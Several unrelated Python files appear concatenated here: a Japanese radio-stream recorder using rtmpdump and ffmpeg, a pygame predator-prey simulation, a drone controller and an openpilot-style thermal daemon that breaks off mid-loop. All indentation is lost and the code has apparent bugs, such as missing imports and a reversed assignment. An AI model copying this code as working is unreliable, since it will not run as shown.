import random
import m3u8
import datetime
import argparse
import subprocess
from pathlib import Path
from time import sleep
from datetime import datetime as dt
from datetime import timedelta
from threading import (Event, Thread)
parser = argparse.ArgumentParser(description='AgRec')
parser.add_argument('-t','--time', help='録画時間(ss)',type=int)
parser.add_argument('-o', '--output', help='ファイル名')
parser.add_argument('-m', '--mode', help='録画モード[1-3](1:rtmp、2:hls、3:両方)', type=int,default=1)
parser.add_argument('-mu', '--multi', help='同時録画数(1サーバー1接続を上限)',type=int,default=1)
args = parser.parse_args()
def ngchr(str):
dic={'\¥': '¥', '/': '/', ':': ':', '*': '*', '?': '?', '!': '!', '¥"': '”', '<': '<', '>': '>','|': '|'}
table='\\/:*?!"<>|'
for ch in table:
if ch in str:
rm = dic.pop(ch)
str = str.replace(ch,rm)
return str
#サーバーチェック
def svchk(num):
th = num
rq = requests.get(listurl)
if rq.status_code != 200:
rtmplist = None
else:
src = str(rq.content).replace(r'\n',"")
src = src.replace(r'\r',"")
src = src.replace(r'\t',"")
serverlist = re.findall(r'<serverinfo>(.+?)<\/serverinfo>',src)
serverlist = [s for s in serverlist if not '<cryptography>true</cryptography>' in s]
rtmplist = []
errurl = []
for server in serverlist:
s = re.findall(r'<server>.+?(rtmp.+?)<\/server>', server)
app = re.findall(r'<app>(.+?)<\/app>', server)
stream = re.findall(r'<stream>(.+?)<\/stream>', server)
url = '{}/{}/{}'.format(s[0],app[0],stream[0])
rtmplist.append(url)
for num in range(1,len(rtmplist)+1):
chk = dir / 'chk@{0}.flv'.format(num)
cmd = str(dumppath) + ' -r ' + rtmplist[num-1] + ' --live -B 1 -o ' +str(chk)
exec('serverchk%d = subprocess.Popen(cmd,shell=True)' % (num-1))
for num in range(1,len(rtmplist)+1):
exec('serverchk%d.communicate()' % (num-1))
chk_ = dir / 'chk@{0}.flv'.format(num)
if chk.stat().st_size == 0:
errurl.append(rtmp)
chk_.unlink()
for url in errurl:
rtmplist.remove(url)
if th:
if th > len(rtmplist):
th = len(rtmplist)
else:
th = 1
rtmplist = random.sample(rtmplist,th)
return rtmplist
def m3u8get(v_m3u8):
v_pl = m3u8.load(v_m3u8)
urls = []
bands = []
for n in range(len(v_pl.playlists)):
pl = v_pl.playlists[n]
urls.append(pl.uri)
bands.append(pl.stream_info.bandwidth)
pl = urls[bands.index(max(bands))]
return pl
def play(_pl):
if high:
pl = m3u8get(high)
else:
pl = _pl
print(pl)
cmd = ('"{0}" "{1}"').format(str(ffplaypath),pl)
subprocess.run(cmd,shell=True)
#rtmp録画
def rtmp(_t,_file,_url):
flvs = []
r_recs = []
for num in range(len(_url)):
if len(_url) != 1:
flvs.append(_file.parent / Path(_file.stem + '@' + str(num+1) + '.flv'))
else:
flvs.append(_file.with_suffix('.flv'))
r_cmd = ('"{0}" -r "{1}" --live -B {2} -o "{3}"').format(str(dumppath),_url[num],_t,str(flvs[num]))
r_recs.append(subprocess.Popen(r_cmd,shell=True))
for num in range(len(_url)):
r_recs[num].communicate()
if _file.suffix != '.flv':
for num in range(len(_url)):
out =str(flvs[num].with_suffix(_file.suffix))
c_cmd = ('"{0}" -i "{1}" -y -c copy "{2}"').format(str(ffmpegpath),str(flvs[num]),out)
conv = subprocess.run(c_cmd,shell=True)
Path(flvs[num]).unlink()
#HLS録画
def hls(_t,_file,_m3u8):
sleep(30) #hlsのラグ調整
td = datetime.timedelta(seconds=_t)
h_out = str(_file.parent / Path(_file.stem + '(hls)' + _file.suffix))
h_cmd = ('"{0}" -ss 0 -i "{1}" -t {2} -y -c copy "{3}"').format(str(ffmpegpath),_m3u8,td,h_out)
subprocess.Popen(h_cmd,shell=True)
dir = Path.cwd()
dumppath = dir / 'exe' / 'rtmpdump.exe'
ffmpegpath = dir / 'exe' / 'ffmpeg.exe'
ffplaypath = dir / 'exe' / 'ffplay.exe'
listurl='http://www.uniqueradio.jp/agplayerf/getfmsListHD.php'
#高画質版に対応する場合はここを編集
high = None
pl = 'http://ic-www.uniqueradio.jp/iphone/3G.m3u8'
fname = args.output
t = args.time
m = args.mode
mu = args.multi
code = 0
if not fname:
code = 1
if not t:
code += 1
if code > 1:
play(pl)
sys.exit()
if code == 1:
sys.exit()
now = dt.now()
DATE = now.strftime('%Y%m%d%H%M')
DATE8 = DATE[:-4]
fname = Path(ngchr(fname) + '_[%s]' % DATE8)
rtmpurl = None
if fname.suffix == '':
fname = Path(str(fname) + '.mp4')
fname = dir / fname
if m != 2:
rtmpurl = svchk(mu)
if not rtmpurl or len(rtmpurl) == 0:
m = 2
if m != 1:
if high:
pl = m3u8get(high)
if pl:
hls= Thread(target=hls,args=(t,fname,pl))
if rtmpurl:
rtmp= Thread(target=rtmp,args=(t,fname,rtmpurl))
if m == 2:
hls.start()
hls.join()
elif m ==3:
hls.start()
rtmp.start()
hls.join()
rtmp.join()
else:
rtmp.start()
rtmp.join()
sys.exit()
|
main.py
|
import pygame
import threading
import time
from bot import *
from maps import *
from find_path import *
from picToMap import *
pygame.init()
# set map size
map_size = (50, 50)
# create paint screen
screen = pygame.display.set_mode((map_size[0] * 10, map_size[1] * 10))
# set window title
pygame.display.set_caption("AI_playground")
# create thread clocks and continue flags
game_clock = pygame.time.Clock()
game_continue = True
physics_clock = pygame.time.Clock()
AI_continue = True
AI_PAUSED = False
graphics_clock = pygame.time.Clock()
graphics_continue = True
# preset color set
ORANGE = (255, 125, 30)
BLUE = (50, 150, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0)
GREY = (200, 200, 200)
# initialize predator positions
predator1 = bot(center_position=[40, 30])
predator2 = bot(center_position=[16, 9])
predator3 = bot(center_position=[30, 10])
# organize predators into a predator list
predatorList = [predator1, predator2, predator3]
# initialize prey position
prey = bot(center_position=[49, 49], move_duration=5, field_of_view=math.pi / 2, range_of_view=15)
# the size of each grid is 10x10 -> map coordinate = pixel coordinate / 10
m = GridWithWeights(map_size[0], map_size[1])
# produce map from grey scale picture, contains walls
mapArray = generateMap("map50_02.bmp", map_size[0], map_size[1])
m.walls = []
for x in range(len(mapArray)):
for y in range(len(mapArray[x])):
if mapArray[x][y] < 255:
# map direction correction
m.walls.append((x, y))
def draw_view_field(bot, color=(0, 0, 0)):
# calculate the left top corner coordinate for the range of view arc
arc_posx = bot.get_pos()[0] * 10 - bot.range_of_view * 10
arc_posy = bot.get_pos()[1] * 10 - bot.range_of_view * 10
# draw arc of view field
pygame.draw.arc(screen,
color,
(arc_posx, arc_posy, bot.range_of_view * 20, bot.range_of_view * 20),
-bot.direction_of_view - bot.field_of_view / 2,
-bot.direction_of_view + bot.field_of_view / 2, 1)
# draw left line of view field
pygame.draw.line(screen,
color,
(bot.get_pos()[0] * 10 + 5, bot.get_pos()[1] * 10 + 5),
(bot.get_pos()[0] * 10 + bot.range_of_view * 10 * math.cos(
bot.direction_of_view + bot.field_of_view / 2),
bot.get_pos()[1] * 10 + bot.range_of_view * 10 * math.sin(
bot.direction_of_view + bot.field_of_view / 2)),
1)
# draw right line of view field
pygame.draw.line(screen,
color,
(bot.get_pos()[0] * 10 + 5, bot.get_pos()[1] * 10 + 5),
(bot.get_pos()[0] * 10 + bot.range_of_view * 10 * math.cos(
bot.direction_of_view - bot.field_of_view / 2),
bot.get_pos()[1] * 10 + bot.range_of_view * 10 * math.sin(
bot.direction_of_view - bot.field_of_view / 2)),
1)
def draw_planned_path(bot, color=(0, 0, 0)):
for (row, col) in bot.pathToTarget:
pygame.draw.rect(screen, color, (row * 10, col * 10, 8, 8))
def graphics_thread():
global prey, m, predatorList
while graphics_continue:
pygame.draw.rect(screen, BLACK, (0, 0, 500, 500))
for row in range(m.height):
for col in range(m.width):
if m.passable((row, col)):
# ground color
c = BLACK
else:
# wall color
c = GREY
# draw map block
pygame.draw.rect(screen, c, (row * 10, col * 10, 8, 8))
# prey
# draw range of view for prey
draw_view_field(prey, GREEN)
# draw planned path
draw_planned_path(prey, BLUE)
# predator
for predator in predatorList:
# draw range of view for each predator
draw_view_field(predator, RED)
# draw planned path
draw_planned_path(predator, ORANGE)
# prey
pygame.draw.rect(screen, GREEN, (prey.get_pos()[0] * 10, prey.get_pos()[1] * 10, 8, 8))
# draw predator them self (to prevent the blue path block cover the predators)
for predator in predatorList:
pygame.draw.rect(screen, RED, (predator.get_pos()[0] * 10, predator.get_pos()[1] * 10, 8, 8))
pygame.display.flip()
graphics_clock.tick(60)
def set_auto_cruise_target(bot, range):
while True:
bot_x = bot.get_pos()[0] + random.randint(-range, range)
bot_y = bot.get_pos()[1] + random.randint(-range, range)
if m.passable((bot_x, bot_y)) and m.in_bounds((bot_x, bot_y)):
break
bot.set_target_pos(bot_x, bot_y)
bot.pathToTarget = a_star_search(m, (bot.get_pos()[0], bot.get_pos()[1]), bot.get_target_pos())
def is_line_blocked_by_wall(x_start=0, y_start=0, x_end=0, y_end=0,):
x, y = 0, 0
diff_x = x_end - x_start
diff_y = y_end - y_start
if diff_x == 0:
for y in range(y_start, y_end):
if not m.passable((x_start, y)):
return True
return False
elif diff_y == 0:
for x in range(x_start, x_end):
if not m.passable((x, y_start)):
return True
return False
def AI_thread():
global predatorList, prey, path, m, AI_PAUSED
while AI_continue:
# pause the simulation
if pygame.key.get_pressed()[pygame.K_SPACE]:
AI_PAUSED = not AI_PAUSED
time.sleep(0.5)
if AI_PAUSED:
continue
# prey AI
# calculate if the prey is in the field range of the predator
# find the closest predator
min_dist = 10000000
escape_vector = [0, 0]
for predator in predatorList:
if (predator.get_pos()[0] - prey.get_pos()[0]) ** 2 + (predator.get_pos()[1] - prey.get_pos()[1]) ** 2 < prey.range_of_view ** 2:
prey_dx = prey.get_pos()[0] - predator.get_pos()[0]
prey_dy = prey.get_pos()[1] - predator.get_pos()[1]
d = prey_dx ** 2 + prey_dy ** 2
if d < min_dist:
d = min_dist
if prey.get_pos()[0] - predator.get_pos()[0] > 0:
escape_vector[0] = 1
elif prey.get_pos()[0] - predator.get_pos()[0] < 0:
escape_vector[0] = -1
if prey.get_pos()[1] - predator.get_pos()[1] > 0:
escape_vector[1] = 1
elif prey.get_pos()[1] - predator.get_pos()[1] < 0:
escape_vector[1] = -1
# print(escape_vector)
if m.passable(escape_vector) and m.in_bounds(escape_vector):
prey.set_target_pos(prey.get_pos()[0] + escape_vector[0], prey.get_pos()[1] + escape_vector[1])
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
if len(prey.pathToTarget) > 1 and prey.timer > prey.get_move_duration():
# set direction to prey
if len(prey.pathToTarget) > 4:
lookingAt = 3
else:
lookingAt = len(prey.pathToTarget) - 1
dx = prey.pathToTarget[lookingAt][0] - prey.get_pos()[0]
dy = prey.pathToTarget[lookingAt][1] - prey.get_pos()[1]
d = math.sqrt(dx ** 2 + dy ** 2)
if d != 0:
if dy > 0:
prey.direction_of_view = math.acos(dx / d)
else:
prey.direction_of_view = math.pi * 2 - math.acos(dx / d)
# move to the next node on path
prey.move_to_next()
# reset timer
prey.timer = 0
elif len(prey.pathToTarget) <= 1:
# plan a new route if the no further nodes left
# a star search
set_auto_cruise_target(prey, prey.range_of_view)
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
else:
# wait for timer to reach move duration limit
prey.timer += 1
# mouse override prey pos
if pygame.key.get_pressed()[pygame.K_a]:
mpx, mpy = pygame.mouse.get_pos()
# translate screen pixel mouse pos to world pos
mouse_pos_x = mpx // 10
mouse_pos_y = mpy // 10
if (mouse_pos_x, mouse_pos_y) in m.walls:
pass
else:
prey.set_pos((mouse_pos_x, mouse_pos_y))
prey.pathToTarget = a_star_search(m, (prey.get_pos()[0], prey.get_pos()[1]), prey.get_target_pos())
# for each predator
for predator in predatorList:
# print(is_line_blocked_by_wall(predator.get_pos()[0], predator.get_pos()[1], prey.get_pos()[0], prey.get_pos()[1]))
# calculate if the prey is in the field range of the predator
if (predator.get_pos()[0] - prey.get_pos()[0])**2 + (predator.get_pos()[1] - prey.get_pos()[1])**2 < predator.range_of_view ** 2:
prey_dx = prey.get_pos()[0] - predator.get_pos()[0]
prey_dy = prey.get_pos()[1] - predator.get_pos()[1]
d = math.sqrt(prey_dx ** 2 + prey_dy ** 2)
if d != 0:
# initialize temp local var angle
angle = 0
if prey_dy > 0:
angle = math.acos(prey_dx / d)
else:
angle = math.pi * 2 - math.acos(prey_dx / d)
# check if the angular position of the prey is in range
if predator.direction_of_view + predator.field_of_view / 2 > angle > predator.direction_of_view - predator.field_of_view / 2:
predator.set_target_pos(prey.get_pos()[0], prey.get_pos()[1])
# recalculate route
predator.pathToTarget = a_star_search(m, (predator.get_pos()[0], predator.get_pos()[1]), predator.get_target_pos())
else:
# if the prey is in range but out of view field angle, enter auto cruise mode
# if the predator reaches prey last sighted spot and found nothing
if predator.get_pos()[0] == predator.get_target_pos()[0] and predator.get_pos()[1] == predator.get_target_pos()[1]:
# randomly generate new prey pos until it is neither in the wall or out of the map
set_auto_cruise_target(predator, predator.range_of_view // 1)
else:
# if the predator reaches prey last sighted spot and found nothing
if predator.get_pos()[0] == predator.get_target_pos()[0] and predator.get_pos()[1] == predator.get_target_pos()[1]:
# randomly generate new prey pos until it is neither in the wall or out of the map
set_auto_cruise_target(predator, predator.range_of_view // 1)
''' find path to prey
without the range of view (max search depth parameter)
the find path algorithm will use 100 as default
'''
# if didn't reach prey and allow to move
if len(predator.pathToTarget) > 1 and predator.timer > predator.get_move_duration():
# set direction to prey
if len(predator.pathToTarget) > 4:
lookingAt = 3
else:
lookingAt = len(predator.pathToTarget) - 1
dx = predator.pathToTarget[lookingAt][0] - predator.get_pos()[0]
dy = predator.pathToTarget[lookingAt][1] - predator.get_pos()[1]
d = math.sqrt(dx**2 + dy**2)
if d != 0:
if dy > 0:
predator.direction_of_view = math.acos(dx / d)
else:
predator.direction_of_view = math.pi * 2 - math.acos(dx / d)
predator.move_to_next()
# reset timer
predator.timer = 0
elif len(predator.pathToTarget) <= 1:
# plan a new route if the no further nodes left
# a star search
predator.pathToTarget = a_star_search(m, (predator.get_pos()[0], predator.get_pos()[1]), predator.get_target_pos())
else:
# wait for timer to reach move duration limit
predator.timer += 1
if predator.get_pos() == prey.get_pos():
print("catches!")
physics_clock.tick(60)
# physics thread predator1
pTarget = threading.Thread(target=AI_thread)
pTarget.start()
# graphics thread predator1
gTarget = threading.Thread(target=graphics_thread)
gTarget.start()
while game_continue:
# basic event control
for event in pygame.event.get():
# window exit
if event.type == pygame.QUIT:
# exit all threads
graphics_continue = False
AI_continue = False
game_continue = False
break
# if event.type == pygame.KEYDOWN:
# if
game_clock.tick(60)
# quit window
exit()
|
drone_controller.py
|
import json
from drones.CrazyFlie import CrazyFlie
from drones.ProxyDrone import ProxyDrone
from drones.drone import serial_connection, Drone, control_drone, WayPoint
import threading
# TODO: this is just a temporary solution
import serial
class DroneController:
def __init__(self, vinter_receiver):
self.drones = dict()
with open('drones.json') as json_file:
data = json.load(json_file)
drones = data["drones"]
for d in drones:
active = d["active"]
if active:
drone_name = d["name"]
drone_type = d["type"]
pid_yaw_p = float(d["pid_yaw_p"])
pid_yaw_i = float(d["pid_yaw_i"])
pid_yaw_d = float(d["pid_yaw_d"])
pid_pitch_p = float(d["pid_pitch_p"])
pid_pitch_i = float(d["pid_pitch_i"])
pid_pitch_d = float(d["pid_pitch_d"])
pid_roll_p = float(d["pid_roll_p"])
pid_roll_i = float(d["pid_roll_i"])
pid_roll_d = float(d["pid_roll_d"])
pid_throttle_p = float(d["pid_throttle_p"])
pid_throttle_i = float(d["pid_throttle_i"])
pid_throttle_d = float(d["pid_throttle_d"])
if drone_type == "ProxyDrone":
drone = ProxyDrone(drone_name, drone_type)
if drone_type == "CrazyFlie":
drone = CrazyFlie(drone_name, drone_type)
drone.active = d["active"]
drone.configure_pid(
pid_yaw_p=pid_yaw_p,
pid_yaw_i=pid_yaw_i,
pid_yaw_d=pid_yaw_d,
pid_pitch_p=pid_pitch_p,
pid_pitch_i=pid_pitch_i,
pid_pitch_d=pid_pitch_d,
pid_roll_p=pid_roll_p,
pid_roll_i=pid_roll_i,
pid_roll_d=pid_roll_d,
pid_throttle_p=pid_throttle_p,
pid_throttle_i=pid_throttle_i,
pid_throttle_d=pid_throttle_d
)
drone.safety_radius = d["safety_radius"]
drone.path = d["path"]
with open("flight_paths/" + drone.path) as json_file:
path = json.load(json_file)
for wp in path:
label = wp["label"]
x = wp["x"]
y = wp["y"]
z = wp["z"]
checkpoint_radius = wp["checkpoint_radius"]
_wp = WayPoint(label, type, x, y, z, checkpoint_radius)
try:
resting_time = wp["resting_time"]
_wp.resting_time = resting_time
except KeyError:
pass
if label == "end":
_wp.disarm_height = wp["disarm_height"]
drone.way_points.append(_wp)
drone.info()
self.drones[drone.drone_name] = drone
print("Added drone:", drone.drone_name)
self.vinter_receiver = vinter_receiver
def start_control_loop(self): # , app):
for d in self.drones.values():
if d.active:
# d.app = app
print("starting control loop for:", d.drone_name)
thread = threading.Thread(target=control_drone, args=(d, self.vinter_receiver))
thread.start()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from system.hardware import HARDWARE, TICI, AGNOS
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from system.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from system.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 1.5 * DT_TRML) # 1.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if AGNOS and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if AGNOS and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
if TICI:
fan_controller = TiciFanController()
elif (sec_since_boot() - sm.rcv_time['pandaStates']/1e9) > DISCONNECT_TIMEOUT:
if onroad_conditions["ignition"]:
onroad_conditions["ignition"] = False
cloudlog.error("panda timed out onroad")
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
